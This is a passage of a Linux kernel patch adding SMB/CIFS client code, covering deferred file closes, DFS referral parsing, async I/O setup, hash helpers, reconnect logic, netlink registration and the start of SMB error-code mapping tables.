++cifs_add_deferred_close(struct cifsFileInfo *cfile, struct cifs_deferred_close *dclose)
++{
++	bool is_deferred = false;
++	struct cifs_deferred_close *pdclose;
++
++	is_deferred = cifs_is_deferred_close(cfile, &pdclose);
++	if (is_deferred) {
++		kfree(dclose);
++		return;
++	}
++
++	dclose->tlink = cfile->tlink;
++	dclose->netfid = cfile->fid.netfid;
++	dclose->persistent_fid = cfile->fid.persistent_fid;
++	dclose->volatile_fid = cfile->fid.volatile_fid;
++	list_add_tail(&dclose->dlist, &CIFS_I(d_inode(cfile->dentry))->deferred_closes);
++}
++
++/*
++ * Critical section which runs after acquiring deferred_lock.
++ */
++void
++cifs_del_deferred_close(struct cifsFileInfo *cfile)
++{
++	bool is_deferred = false;
++	struct cifs_deferred_close *dclose;
++
++	is_deferred = cifs_is_deferred_close(cfile, &dclose);
++	if (!is_deferred)
++		return;
++	list_del(&dclose->dlist);
++	kfree(dclose);
++}
++
++void
++cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode)
++{
++	struct cifsFileInfo *cfile = NULL;
++	struct file_list *tmp_list, *tmp_next_list;
++	struct list_head file_head;
++
++	if (cifs_inode == NULL)
++		return;
++
++	INIT_LIST_HEAD(&file_head);
++	spin_lock(&cifs_inode->open_file_lock);
++	list_for_each_entry(cfile, &cifs_inode->openFileList, flist) {
++		if (delayed_work_pending(&cfile->deferred)) {
++			if (cancel_delayed_work(&cfile->deferred)) {
++				spin_lock(&cifs_inode->deferred_lock);
++				cifs_del_deferred_close(cfile);
++				spin_unlock(&cifs_inode->deferred_lock);
++
++				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
++				if (tmp_list == NULL)
++					break;
++				tmp_list->cfile = cfile;
++				list_add_tail(&tmp_list->list, &file_head);
++			}
++		}
++	}
++	spin_unlock(&cifs_inode->open_file_lock);
++
++	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
++		_cifsFileInfo_put(tmp_list->cfile, false, false);
++		list_del(&tmp_list->list);
++		kfree(tmp_list);
++	}
++}
++
++void
++cifs_close_all_deferred_files(struct cifs_tcon *tcon)
++{
++	struct cifsFileInfo *cfile;
++	struct file_list *tmp_list, *tmp_next_list;
++	struct list_head file_head;
++
++	INIT_LIST_HEAD(&file_head);
++	spin_lock(&tcon->open_file_lock);
++	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++		if (delayed_work_pending(&cfile->deferred)) {
++			if (cancel_delayed_work(&cfile->deferred)) {
++				spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
++				cifs_del_deferred_close(cfile);
++				spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
++
++				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
++				if (tmp_list == NULL)
++					break;
++				tmp_list->cfile = cfile;
++				list_add_tail(&tmp_list->list, &file_head);
++			}
++		}
++	}
++	spin_unlock(&tcon->open_file_lock);
++
++	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
++		_cifsFileInfo_put(tmp_list->cfile, true, false);
++		list_del(&tmp_list->list);
++		kfree(tmp_list);
++	}
++}
++void
++cifs_close_deferred_file_under_dentry(struct cifs_tcon *tcon, const char *path)
++{
++	struct cifsFileInfo *cfile;
++	struct file_list *tmp_list, *tmp_next_list;
++	struct list_head file_head;
++	void *page;
++	const char *full_path;
++
++	INIT_LIST_HEAD(&file_head);
++	page = alloc_dentry_path();
++	spin_lock(&tcon->open_file_lock);
++	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++		full_path = build_path_from_dentry(cfile->dentry, page);
++		if (strstr(full_path, path)) {
++			if (delayed_work_pending(&cfile->deferred)) {
++				if (cancel_delayed_work(&cfile->deferred)) {
++					spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
++					cifs_del_deferred_close(cfile);
++					spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
++
++					tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
++					if (tmp_list == NULL)
++						break;
++					tmp_list->cfile = cfile;
++					list_add_tail(&tmp_list->list, &file_head);
++				}
++			}
++		}
++	}
++	spin_unlock(&tcon->open_file_lock);
++
++	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
++		_cifsFileInfo_put(tmp_list->cfile, true, false);
++		list_del(&tmp_list->list);
++		kfree(tmp_list);
++	}
++	free_dentry_path(page);
++}
++
++/* parses DFS referral V3 structure
++ * caller is responsible for freeing target_nodes
++ * returns:
++ * - on success - 0
++ * - on failure - errno
++ */
++int
++parse_dfs_referrals(struct get_dfs_referral_rsp *rsp, u32 rsp_size,
++		    unsigned int *num_of_nodes,
++		    struct dfs_info3_param **target_nodes,
++		    const struct nls_table *nls_codepage, int remap,
++		    const char *searchName, bool is_unicode)
++{
++	int i, rc = 0;
++	char *data_end;
++	struct dfs_referral_level_3 *ref;
++
++	*num_of_nodes = le16_to_cpu(rsp->NumberOfReferrals);
++
++	if (*num_of_nodes < 1) {
++		cifs_dbg(VFS, "num_referrals: must be at least > 0, but we get num_referrals = %d\n",
++			 *num_of_nodes);
++		rc = -EINVAL;
++		goto parse_DFS_referrals_exit;
++	}
++
++	ref = (struct dfs_referral_level_3 *) &(rsp->referrals);
++	if (ref->VersionNumber != cpu_to_le16(3)) {
++		cifs_dbg(VFS, "Referrals of V%d version are not supported, should be V3\n",
++			 le16_to_cpu(ref->VersionNumber));
++		rc = -EINVAL;
++		goto parse_DFS_referrals_exit;
++	}
++
++	/* get the upper boundary of the resp buffer */
++	data_end = (char *)rsp + rsp_size;
++
++	cifs_dbg(FYI, "num_referrals: %d dfs flags: 0x%x ...\n",
++		 *num_of_nodes, le32_to_cpu(rsp->DFSFlags));
++
++	*target_nodes = kcalloc(*num_of_nodes, sizeof(struct dfs_info3_param),
++				GFP_KERNEL);
++	if (*target_nodes == NULL) {
++		rc = -ENOMEM;
++		goto parse_DFS_referrals_exit;
++	}
++
++	/* collect necessary data from referrals */
++	for (i = 0; i < *num_of_nodes; i++) {
++		char *temp;
++		int max_len;
++		struct dfs_info3_param *node = (*target_nodes)+i;
++
++		node->flags = le32_to_cpu(rsp->DFSFlags);
++		if (is_unicode) {
++			__le16 *tmp = kmalloc(strlen(searchName)*2 + 2,
++						GFP_KERNEL);
++			if (tmp == NULL) {
++				rc = -ENOMEM;
++				goto parse_DFS_referrals_exit;
++			}
++			cifsConvertToUTF16((__le16 *) tmp, searchName,
++					   PATH_MAX, nls_codepage, remap);
++			node->path_consumed = cifs_utf16_bytes(tmp,
++					le16_to_cpu(rsp->PathConsumed),
++					nls_codepage);
++			kfree(tmp);
++		} else
++			node->path_consumed = le16_to_cpu(rsp->PathConsumed);
++
++		node->server_type = le16_to_cpu(ref->ServerType);
++		node->ref_flag = le16_to_cpu(ref->ReferralEntryFlags);
++
++		/* copy DfsPath */
++		temp = (char *)ref + le16_to_cpu(ref->DfsPathOffset);
++		max_len = data_end - temp;
++		node->path_name = cifs_strndup_from_utf16(temp, max_len,
++						is_unicode, nls_codepage);
++		if (!node->path_name) {
++			rc = -ENOMEM;
++			goto parse_DFS_referrals_exit;
++		}
++
++		/* copy link target UNC */
++		temp = (char *)ref + le16_to_cpu(ref->NetworkAddressOffset);
++		max_len = data_end - temp;
++		node->node_name = cifs_strndup_from_utf16(temp, max_len,
++						is_unicode, nls_codepage);
++		if (!node->node_name) {
++			rc = -ENOMEM;
++			goto parse_DFS_referrals_exit;
++		}
++
++		node->ttl = le32_to_cpu(ref->TimeToLive);
++
++		ref++;
++	}
++
++parse_DFS_referrals_exit:
++	if (rc) {
++		free_dfs_info_array(*target_nodes, *num_of_nodes);
++		*target_nodes = NULL;
++		*num_of_nodes = 0;
++	}
++	return rc;
++}
++
++struct cifs_aio_ctx *
++cifs_aio_ctx_alloc(void)
++{
++	struct cifs_aio_ctx *ctx;
++
++	/*
++	 * Must use kzalloc to initialize ctx->bv to NULL and ctx->direct_io
++	 * to false so that we know when we have to unreference pages within
++	 * cifs_aio_ctx_release()
++	 */
++	ctx = kzalloc(sizeof(struct cifs_aio_ctx), GFP_KERNEL);
++	if (!ctx)
++		return NULL;
++
++	INIT_LIST_HEAD(&ctx->list);
++	mutex_init(&ctx->aio_mutex);
++	init_completion(&ctx->done);
++	kref_init(&ctx->refcount);
++	return ctx;
++}
++
++void
++cifs_aio_ctx_release(struct kref *refcount)
++{
++	struct cifs_aio_ctx *ctx = container_of(refcount,
++					struct cifs_aio_ctx, refcount);
++
++	cifsFileInfo_put(ctx->cfile);
++
++	/*
++	 * ctx->bv is only set if setup_aio_ctx_iter() was call successfuly
++	 * which means that iov_iter_get_pages() was a success and thus that
++	 * we have taken reference on pages.
++	 */
++	if (ctx->bv) {
++		unsigned i;
++
++		for (i = 0; i < ctx->npages; i++) {
++			if (ctx->should_dirty)
++				set_page_dirty(ctx->bv[i].bv_page);
++			put_page(ctx->bv[i].bv_page);
++		}
++		kvfree(ctx->bv);
++	}
++
++	kfree(ctx);
++}
++
++#define CIFS_AIO_KMALLOC_LIMIT (1024 * 1024)
++
++int
++setup_aio_ctx_iter(struct cifs_aio_ctx *ctx, struct iov_iter *iter, int rw)
++{
++	ssize_t rc;
++	unsigned int cur_npages;
++	unsigned int npages = 0;
++	unsigned int i;
++	size_t len;
++	size_t count = iov_iter_count(iter);
++	unsigned int saved_len;
++	size_t start;
++	unsigned int max_pages = iov_iter_npages(iter, INT_MAX);
++	struct page **pages = NULL;
++	struct bio_vec *bv = NULL;
++
++	if (iov_iter_is_kvec(iter)) {
++		memcpy(&ctx->iter, iter, sizeof(*iter));
++		ctx->len = count;
++		iov_iter_advance(iter, count);
++		return 0;
++	}
++
++	if (array_size(max_pages, sizeof(*bv)) <= CIFS_AIO_KMALLOC_LIMIT)
++		bv = kmalloc_array(max_pages, sizeof(*bv), GFP_KERNEL);
++
++	if (!bv) {
++		bv = vmalloc(array_size(max_pages, sizeof(*bv)));
++		if (!bv)
++			return -ENOMEM;
++	}
++
++	if (array_size(max_pages, sizeof(*pages)) <= CIFS_AIO_KMALLOC_LIMIT)
++		pages = kmalloc_array(max_pages, sizeof(*pages), GFP_KERNEL);
++
++	if (!pages) {
++		pages = vmalloc(array_size(max_pages, sizeof(*pages)));
++		if (!pages) {
++			kvfree(bv);
++			return -ENOMEM;
++		}
++	}
++
++	saved_len = count;
++
++	while (count && npages < max_pages) {
++		rc = iov_iter_get_pages2(iter, pages, count, max_pages, &start);
++		if (rc < 0) {
++			cifs_dbg(VFS, "Couldn't get user pages (rc=%zd)\n", rc);
++			break;
++		}
++
++		if (rc > count) {
++			cifs_dbg(VFS, "get pages rc=%zd more than %zu\n", rc,
++				 count);
++			break;
++		}
++
++		count -= rc;
++		rc += start;
++		cur_npages = DIV_ROUND_UP(rc, PAGE_SIZE);
++
++		if (npages + cur_npages > max_pages) {
++			cifs_dbg(VFS, "out of vec array capacity (%u vs %u)\n",
++				 npages + cur_npages, max_pages);
++			break;
++		}
++
++		for (i = 0; i < cur_npages; i++) {
++			len = rc > PAGE_SIZE ? PAGE_SIZE : rc;
++			bv[npages + i].bv_page = pages[i];
++			bv[npages + i].bv_offset = start;
++			bv[npages + i].bv_len = len - start;
++			rc -= len;
++			start = 0;
++		}
++
++		npages += cur_npages;
++	}
++
++	kvfree(pages);
++	ctx->bv = bv;
++	ctx->len = saved_len - count;
++	ctx->npages = npages;
++	iov_iter_bvec(&ctx->iter, rw, ctx->bv, npages, ctx->len);
++	return 0;
++}
++
++/**
++ * cifs_alloc_hash - allocate hash and hash context together
++ * @name: The name of the crypto hash algo
++ * @sdesc: SHASH descriptor where to put the pointer to the hash TFM
++ *
++ * The caller has to make sure @sdesc is initialized to either NULL or
++ * a valid context. It can be freed via cifs_free_hash().
++ */
++int
++cifs_alloc_hash(const char *name, struct shash_desc **sdesc)
++{
++	int rc = 0;
++	struct crypto_shash *alg = NULL;
++
++	if (*sdesc)
++		return 0;
++
++	alg = crypto_alloc_shash(name, 0, 0);
++	if (IS_ERR(alg)) {
++		cifs_dbg(VFS, "Could not allocate shash TFM '%s'\n", name);
++		rc = PTR_ERR(alg);
++		*sdesc = NULL;
++		return rc;
++	}
++
++	*sdesc = kmalloc(sizeof(struct shash_desc) + crypto_shash_descsize(alg), GFP_KERNEL);
++	if (*sdesc == NULL) {
++		cifs_dbg(VFS, "no memory left to allocate shash TFM '%s'\n", name);
++		crypto_free_shash(alg);
++		return -ENOMEM;
++	}
++
++	(*sdesc)->tfm = alg;
++	return 0;
++}
++
++/**
++ * cifs_free_hash - free hash and hash context together
++ * @sdesc: Where to find the pointer to the hash TFM
++ *
++ * Freeing a NULL descriptor is safe.
++ */
++void
++cifs_free_hash(struct shash_desc **sdesc)
++{
++	if (unlikely(!sdesc) || !*sdesc)
++		return;
++
++	if ((*sdesc)->tfm) {
++		crypto_free_shash((*sdesc)->tfm);
++		(*sdesc)->tfm = NULL;
++	}
++
++	kfree_sensitive(*sdesc);
++	*sdesc = NULL;
++}
++
++/**
++ * rqst_page_get_length - obtain the length and offset for a page in smb_rqst
++ * @rqst: The request descriptor
++ * @page: The index of the page to query
++ * @len: Where to store the length for this page:
++ * @offset: Where to store the offset for this page
++ */
++void rqst_page_get_length(const struct smb_rqst *rqst, unsigned int page,
++			  unsigned int *len, unsigned int *offset)
++{
++	*len = rqst->rq_pagesz;
++	*offset = (page == 0) ? rqst->rq_offset : 0;
++
++	if (rqst->rq_npages == 1 || page == rqst->rq_npages-1)
++		*len = rqst->rq_tailsz;
++	else if (page == 0)
++		*len = rqst->rq_pagesz - rqst->rq_offset;
++}
++
++void extract_unc_hostname(const char *unc, const char **h, size_t *len)
++{
++	const char *end;
++
++	/* skip initial slashes */
++	while (*unc && (*unc == '\\' || *unc == '/'))
++		unc++;
++
++	end = unc;
++
++	while (*end && !(*end == '\\' || *end == '/'))
++		end++;
++
++	*h = unc;
++	*len = end - unc;
++}
++
++/**
++ * copy_path_name - copy src path to dst, possibly truncating
++ * @dst: The destination buffer
++ * @src: The source name
++ *
++ * returns number of bytes written (including trailing nul)
++ */
++int copy_path_name(char *dst, const char *src)
++{
++	int name_len;
++
++	/*
++	 * PATH_MAX includes nul, so if strlen(src) >= PATH_MAX it
++	 * will truncate and strlen(dst) will be PATH_MAX-1
++	 */
++	name_len = strscpy(dst, src, PATH_MAX);
++	if (WARN_ON_ONCE(name_len < 0))
++		name_len = PATH_MAX-1;
++
++	/* we count the trailing nul */
++	name_len++;
++	return name_len;
++}
++
++struct super_cb_data {
++	void *data;
++	struct super_block *sb;
++};
++
++static void tcp_super_cb(struct super_block *sb, void *arg)
++{
++	struct super_cb_data *sd = arg;
++	struct TCP_Server_Info *server = sd->data;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_tcon *tcon;
++
++	if (sd->sb)
++		return;
++
++	cifs_sb = CIFS_SB(sb);
++	tcon = cifs_sb_master_tcon(cifs_sb);
++	if (tcon->ses->server == server)
++		sd->sb = sb;
++}
++
++static struct super_block *__cifs_get_super(void (*f)(struct super_block *, void *),
++					    void *data)
++{
++	struct super_cb_data sd = {
++		.data = data,
++		.sb = NULL,
++	};
++	struct file_system_type **fs_type = (struct file_system_type *[]) {
++		&cifs_fs_type, &smb3_fs_type, NULL,
++	};
++
++	for (; *fs_type; fs_type++) {
++		iterate_supers_type(*fs_type, f, &sd);
++		if (sd.sb) {
++			/*
++			 * Grab an active reference in order to prevent automounts (DFS links)
++			 * of expiring and then freeing up our cifs superblock pointer while
++			 * we're doing failover.
++			 */
++			cifs_sb_active(sd.sb);
++			return sd.sb;
++		}
++	}
++	return ERR_PTR(-EINVAL);
++}
++
++static void __cifs_put_super(struct super_block *sb)
++{
++	if (!IS_ERR_OR_NULL(sb))
++		cifs_sb_deactive(sb);
++}
++
++struct super_block *cifs_get_tcp_super(struct TCP_Server_Info *server)
++{
++	return __cifs_get_super(tcp_super_cb, server);
++}
++
++void cifs_put_tcp_super(struct super_block *sb)
++{
++	__cifs_put_super(sb);
++}
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++int match_target_ip(struct TCP_Server_Info *server,
++		    const char *share, size_t share_len,
++		    bool *result)
++{
++	int rc;
++	char *target, *tip = NULL;
++	struct sockaddr tipaddr;
++
++	*result = false;
++
++	target = kzalloc(share_len + 3, GFP_KERNEL);
++	if (!target) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	scnprintf(target, share_len + 3, "\\\\%.*s", (int)share_len, share);
++
++	cifs_dbg(FYI, "%s: target name: %s\n", __func__, target + 2);
++
++	rc = dns_resolve_server_name_to_ip(target, &tip, NULL);
++	if (rc < 0)
++		goto out;
++
++	cifs_dbg(FYI, "%s: target ip: %s\n", __func__, tip);
++
++	if (!cifs_convert_address(&tipaddr, tip, strlen(tip))) {
++		cifs_dbg(VFS, "%s: failed to convert target ip address\n",
++			 __func__);
++		rc = -EINVAL;
++		goto out;
++	}
++
++	*result = cifs_match_ipaddr((struct sockaddr *)&server->dstaddr,
++				    &tipaddr);
++	cifs_dbg(FYI, "%s: ip addresses match: %u\n", __func__, *result);
++	rc = 0;
++
++out:
++	kfree(target);
++	kfree(tip);
++
++	return rc;
++}
++
++int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
++{
++	kfree(cifs_sb->prepath);
++
++	if (prefix && *prefix) {
++		cifs_sb->prepath = cifs_sanitize_prepath(prefix, GFP_ATOMIC);
++		if (!cifs_sb->prepath)
++			return -ENOMEM;
++
++		convert_delimiter(cifs_sb->prepath, CIFS_DIR_SEP(cifs_sb));
++	} else
++		cifs_sb->prepath = NULL;
++
++	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
++	return 0;
++}
++
++/*
++ * Handle weird Windows SMB server behaviour. It responds with
++ * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request for
++ * "\<server>\<dfsname>\<linkpath>" DFS reference, where <dfsname> contains
++ * non-ASCII unicode symbols.
++ */
++int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink)
++{
++	struct cifs_ses *ses = tcon->ses;
++	size_t len;
++	char *path;
++	char *ref_path;
++
++	*islink = false;
++
++	/*
++	 * Fast path - skip check when @full_path doesn't have a prefix path to
++	 * look up or tcon is not DFS.
++	 */
++	if (strlen(full_path) < 2 || !cifs_sb ||
++	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
++	    !is_tcon_dfs(tcon) || !ses->server->origin_fullpath)
++		return 0;
++
++	/*
++	 * Slow path - tcon is DFS and @full_path has prefix path, so attempt
++	 * to get a referral to figure out whether it is an DFS link.
++	 */
++	len = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1) + strlen(full_path) + 1;
++	path = kmalloc(len, GFP_KERNEL);
++	if (!path)
++		return -ENOMEM;
++
++	scnprintf(path, len, "%s%s", tcon->tree_name, full_path);
++	ref_path = dfs_cache_canonical_path(path + 1, cifs_sb->local_nls,
++					    cifs_remap(cifs_sb));
++	kfree(path);
++
++	if (IS_ERR(ref_path)) {
++		if (PTR_ERR(ref_path) != -EINVAL)
++			return PTR_ERR(ref_path);
++	} else {
++		struct dfs_info3_param *refs = NULL;
++		int num_refs = 0;
++
++		/*
++		 * XXX: we are not using dfs_cache_find() here because we might
++		 * end filling all the DFS cache and thus potentially
++		 * removing cached DFS targets that the client would eventually
++		 * need during failover.
++		 */
++		if (ses->server->ops->get_dfs_refer &&
++		    !ses->server->ops->get_dfs_refer(xid, ses, ref_path, &refs,
++						     &num_refs, cifs_sb->local_nls,
++						     cifs_remap(cifs_sb)))
++			*islink = refs[0].server_type == DFS_TYPE_LINK;
++		free_dfs_info_array(refs, num_refs);
++		kfree(ref_path);
++	}
++	return 0;
++}
++#endif
++
++int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry)
++{
++	int timeout = 10;
++	int rc;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus != CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++	timeout *= server->nr_targets;
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * Give demultiplex thread up to 10 seconds to each target available for
++	 * reconnect -- should be greater than cifs socket timeout which is 7
++	 * seconds.
++	 *
++	 * On "soft" mounts we wait once. Hard mounts keep retrying until
++	 * process is killed or server comes back on-line.
++	 */
++	do {
++		rc = wait_event_interruptible_timeout(server->response_q,
++						      (server->tcpStatus != CifsNeedReconnect),
++						      timeout * HZ);
++		if (rc < 0) {
++			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
++				 __func__);
++			return -ERESTARTSYS;
++		}
++
++		/* are we still trying to reconnect? */
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsNeedReconnect) {
++			spin_unlock(&server->srv_lock);
++			return 0;
++		}
++		spin_unlock(&server->srv_lock);
++	} while (retry);
++
++	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
++	return -EHOSTDOWN;
++}
+diff --git a/fs/smb/client/netlink.c b/fs/smb/client/netlink.c
+new file mode 100644
+index 0000000000000..147d9409252cd
+--- /dev/null
++++ b/fs/smb/client/netlink.c
+@@ -0,0 +1,90 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Netlink routines for CIFS
++ *
++ * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
++ */
++
++#include <net/genetlink.h>
++#include <uapi/linux/cifs/cifs_netlink.h>
++
++#include "netlink.h"
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "cifs_swn.h"
++
++static const struct nla_policy cifs_genl_policy[CIFS_GENL_ATTR_MAX + 1] = {
++	[CIFS_GENL_ATTR_SWN_REGISTRATION_ID]	= { .type = NLA_U32 },
++	[CIFS_GENL_ATTR_SWN_NET_NAME]		= { .type = NLA_STRING },
++	[CIFS_GENL_ATTR_SWN_SHARE_NAME]		= { .type = NLA_STRING },
++	[CIFS_GENL_ATTR_SWN_IP]			= { .len = sizeof(struct sockaddr_storage) },
++	[CIFS_GENL_ATTR_SWN_NET_NAME_NOTIFY]	= { .type = NLA_FLAG },
++	[CIFS_GENL_ATTR_SWN_SHARE_NAME_NOTIFY]	= { .type = NLA_FLAG },
++	[CIFS_GENL_ATTR_SWN_IP_NOTIFY]		= { .type = NLA_FLAG },
++	[CIFS_GENL_ATTR_SWN_KRB_AUTH]		= { .type = NLA_FLAG },
++	[CIFS_GENL_ATTR_SWN_USER_NAME]		= { .type = NLA_STRING },
++	[CIFS_GENL_ATTR_SWN_PASSWORD]		= { .type = NLA_STRING },
++	[CIFS_GENL_ATTR_SWN_DOMAIN_NAME]	= { .type = NLA_STRING },
++	[CIFS_GENL_ATTR_SWN_NOTIFICATION_TYPE]	= { .type = NLA_U32 },
++	[CIFS_GENL_ATTR_SWN_RESOURCE_STATE]	= { .type = NLA_U32 },
++	[CIFS_GENL_ATTR_SWN_RESOURCE_NAME]	= { .type = NLA_STRING},
++};
++
++static const struct genl_ops cifs_genl_ops[] = {
++	{
++		.cmd = CIFS_GENL_CMD_SWN_NOTIFY,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = cifs_swn_notify,
++	},
++};
++
++static const struct genl_multicast_group cifs_genl_mcgrps[] = {
++	[CIFS_GENL_MCGRP_SWN] = { .name = CIFS_GENL_MCGRP_SWN_NAME },
++};
++
++struct genl_family cifs_genl_family = {
++	.name		= CIFS_GENL_NAME,
++	.version	= CIFS_GENL_VERSION,
++	.hdrsize	= 0,
++	.maxattr	= CIFS_GENL_ATTR_MAX,
++	.module		= THIS_MODULE,
++	.policy		= cifs_genl_policy,
++	.ops		= cifs_genl_ops,
++	.n_ops		= ARRAY_SIZE(cifs_genl_ops),
++	.resv_start_op	= CIFS_GENL_CMD_SWN_NOTIFY + 1,
++	.mcgrps		= cifs_genl_mcgrps,
++	.n_mcgrps	= ARRAY_SIZE(cifs_genl_mcgrps),
++};
++
++/**
++ * cifs_genl_init - Register generic netlink family
++ *
++ * Return zero if initialized successfully, otherwise non-zero.
++ */
++int cifs_genl_init(void)
++{
++	int ret;
++
++	ret = genl_register_family(&cifs_genl_family);
++	if (ret < 0) {
++		cifs_dbg(VFS, "%s: failed to register netlink family\n",
++				__func__);
++		return ret;
++	}
++
++	return 0;
++}
++
++/**
++ * cifs_genl_exit - Unregister generic netlink family
++ */
++void cifs_genl_exit(void)
++{
++	int ret;
++
++	ret = genl_unregister_family(&cifs_genl_family);
++	if (ret < 0) {
++		cifs_dbg(VFS, "%s: failed to unregister netlink family\n",
++				__func__);
++	}
++}
+diff --git a/fs/smb/client/netlink.h b/fs/smb/client/netlink.h
+new file mode 100644
+index 0000000000000..e2fa8ed24c546
+--- /dev/null
++++ b/fs/smb/client/netlink.h
+@@ -0,0 +1,16 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Netlink routines for CIFS
++ *
++ * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
++ */
++
++#ifndef _CIFS_NETLINK_H
++#define _CIFS_NETLINK_H
++
++extern struct genl_family cifs_genl_family;
++
++extern int cifs_genl_init(void);
++extern void cifs_genl_exit(void);
++
++#endif /* _CIFS_NETLINK_H */
+diff --git a/fs/smb/client/netmisc.c b/fs/smb/client/netmisc.c
+new file mode 100644
+index 0000000000000..1b52e6ac431cb
+--- /dev/null
++++ b/fs/smb/client/netmisc.c
+@@ -0,0 +1,1021 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ *   Error mapping routines from Samba libsmb/errormap.c
++ *   Copyright (C) Andrew Tridgell 2001
++ */
++
++#include <linux/net.h>
++#include <linux/string.h>
++#include <linux/in.h>
++#include <linux/ctype.h>
++#include <linux/fs.h>
++#include <asm/div64.h>
++#include <asm/byteorder.h>
++#include <linux/inet.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "smberr.h"
++#include "cifs_debug.h"
++#include "nterr.h"
++
++struct smb_to_posix_error {
++	__u16 smb_err;
++	int posix_code;
++};
++
++static const struct smb_to_posix_error mapping_table_ERRDOS[] = {
++	{ERRbadfunc, -EINVAL},
++	{ERRbadfile, -ENOENT},
++	{ERRbadpath, -ENOTDIR},
++	{ERRnofids, -EMFILE},
++	{ERRnoaccess, -EACCES},
++	{ERRbadfid, -EBADF},
++	{ERRbadmcb, -EIO},
++	{ERRnomem, -EREMOTEIO},
++	{ERRbadmem, -EFAULT},
++	{ERRbadenv, -EFAULT},
++	{ERRbadformat, -EINVAL},
++	{ERRbadaccess, -EACCES},
++	{ERRbaddata, -EIO},
++	{ERRbaddrive, -ENXIO},
++	{ERRremcd, -EACCES},
++	{ERRdiffdevice, -EXDEV},
++	{ERRnofiles, -ENOENT},
++	{ERRwriteprot, -EROFS},
++	{ERRbadshare, -EBUSY},
++	{ERRlock, -EACCES},
++	{ERRunsup, -EINVAL},
++	{ERRnosuchshare, -ENXIO},
++	{ERRfilexists, -EEXIST},
++	{ERRinvparm, -EINVAL},
++	{ERRdiskfull, -ENOSPC},
++	{ERRinvname, -ENOENT},
++	{ERRinvlevel, -EOPNOTSUPP},
++	{ERRdirnotempty, -ENOTEMPTY},
++	{ERRnotlocked, -ENOLCK},
++	{ERRcancelviolation, -ENOLCK},
++	{ERRalreadyexists, -EEXIST},
++	{ERRmoredata, -EOVERFLOW},
++	{ERReasnotsupported, -EOPNOTSUPP},
++	{ErrQuota, -EDQUOT},
++	{ErrNotALink, -ENOLINK},
++	{ERRnetlogonNotStarted, -ENOPROTOOPT},
++	{ERRsymlink, -EOPNOTSUPP},
++	{ErrTooManyLinks, -EMLINK},
++	{0, 0}
++};
++
++static const struct smb_to_posix_error mapping_table_ERRSRV[] = {
++	{ERRerror, -EIO},
++	{ERRbadpw, -EACCES},  /* was EPERM */
++	{ERRbadtype, -EREMOTE},
++	{ERRaccess, -EACCES},
++	{ERRinvtid, -ENXIO},
++	{ERRinvnetname, -ENXIO},
++	{ERRinvdevice, -ENXIO},
++	{ERRqfull, -ENOSPC},
++	{ERRqtoobig, -ENOSPC},
++	{ERRqeof, -EIO},
++	{ERRinvpfid, -EBADF},
++	{ERRsmbcmd, -EBADRQC},
++	{ERRsrverror, -EIO},
++	{ERRbadBID, -EIO},
++	{ERRfilespecs, -EINVAL},
++	{ERRbadLink, -EIO},
++	{ERRbadpermits, -EINVAL},
++	{ERRbadPID, -ESRCH},
++	{ERRsetattrmode, -EINVAL},
++	{ERRpaused, -EHOSTDOWN},
++	{ERRmsgoff, -EHOSTDOWN},
++	{ERRnoroom, -ENOSPC},
++	{ERRrmuns, -EUSERS},
++	{ERRtimeout, -ETIME},
++	{ERRnoresource, -EREMOTEIO},
++	{ERRtoomanyuids, -EUSERS},
++	{ERRbaduid, -EACCES},
++	{ERRusempx, -EIO},
++	{ERRusestd, -EIO},
++	{ERR_NOTIFY_ENUM_DIR, -ENOBUFS},
++	{ERRnoSuchUser, -EACCES},
++/*	{ERRaccountexpired, -EACCES},
++	{ERRbadclient, -EACCES},
++	{ERRbadLogonTime, -EACCES},
++	{ERRpasswordExpired, -EACCES},*/
++	{ERRaccountexpired, -EKEYEXPIRED},
++	{ERRbadclient, -EACCES},
++	{ERRbadLogonTime, -EACCES},
++	{ERRpasswordExpired, -EKEYEXPIRED},
++
++	{ERRnosupport, -EINVAL},
++	{0, 0}
++};
++
++/*
